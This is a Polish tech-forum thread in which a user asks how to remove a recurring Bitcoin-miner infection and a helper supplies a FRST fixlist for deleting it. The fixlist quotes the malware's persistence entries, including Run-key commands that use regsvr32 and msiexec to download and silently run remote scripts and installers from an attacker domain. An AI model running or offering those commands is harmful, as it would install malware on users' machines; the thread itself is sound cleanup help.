Elektroda.pl
Elektroda.pl
X
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Wirus Bitcoinminner jak usunąć?

jimmy840310 17 Sie 2017 22:34 465 4
  • #1 17 Sie 2017 22:34
    jimmy840310
    Poziom 2  

    Witam, używam program f -secure jako antywirusa, od wczoraj wykrywa mi Bitcoinminner niby go usuwa ale za jakiś czas ten szajs znów wyskakuje, ktoś wie jak to usunąć tylko proszę o wytłumaczenie jak przysłowiowej blondynce, łącznie jak zrobić logi itd...

    Edit: dodałem log.

    0 4
  • Pomocny post
    #2 17 Sie 2017 22:59
    Kolobos
    Spec od komputerów

    Jeszcze addition, do tego nie wstawiaj spacji przed przecinkami.

    0
  • #3 17 Sie 2017 23:01
    jimmy840310
    Poziom 2  

    wstawione sorki za przecinki

    0
  • Pomocny post
    #4 18 Sie 2017 06:11
    krzychupar
    Poziom 40  

    Otwórz notatnik systemowy i wklej:

    Task: {233A9477-8CB3-4F80-B3D3-DB2F7A59666B} - System32\Tasks\Opera scheduled Autoupdate 1480232669 => C:\Program Files\Opera\launcher.exe [2017-01-16] (Opera Software)
    ContextMenuHandlers1: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => -> No File
    ContextMenuHandlers2: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => -> No File
    ContextMenuHandlers4: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => -> No File
    ContextMenuHandlers6: [GridinSoft Anti-Malware] -> {F77F27A6-89F3-471A-AFA8-3B280940A10C} => -> No File
    Task: {38E96A2B-8CEE-4396-A3B2-B642DD5A9483} - \Mysa2 -> No File <==== ATTENTION
    Task: {89BB3184-BFAF-4405-8A65-EB24EA33BC24} - \Mysa1 -> No File <==== ATTENTION
    Task: {90BBF562-2B95-4E68-906D-768D711C2ABA} - \Mysa3 -> No File <==== ATTENTION
    Task: {EC1900B6-9132-40B5-A14D-3914D02B889C} - \Mysa -> No File <==== ATTENTION
    WMI_ActiveScriptEventConsumer_fuckyoumm2_consumer: <==== ATTENTION
    HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.mykings.top:280/v.sct scrobj.dll <==== ATTENTION
    HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.mykings.top:280/helloworld.msi /q <==== ATTENTION
    GroupPolicyScripts: Restriction <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{3bef2f4a-63d1-4d27-857b-356a6b4fc0e4} <==== ATTENTION (Restriction - IP)
    Toolbar: HKU\S-1-5-21-2591350480-3079650882-237524929-1000 -> No Name - {1DAC0C53-7D23-4AB3-856A-B04D98CD982A} - No File
    CHR HKLM\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    EmptyTemp:

    Plik zapisz pod nazwą fixlist.txt i umieść w folderze obok FRST.exe.
    Uruchom FRST i kliknij w Fix/Napraw.

    0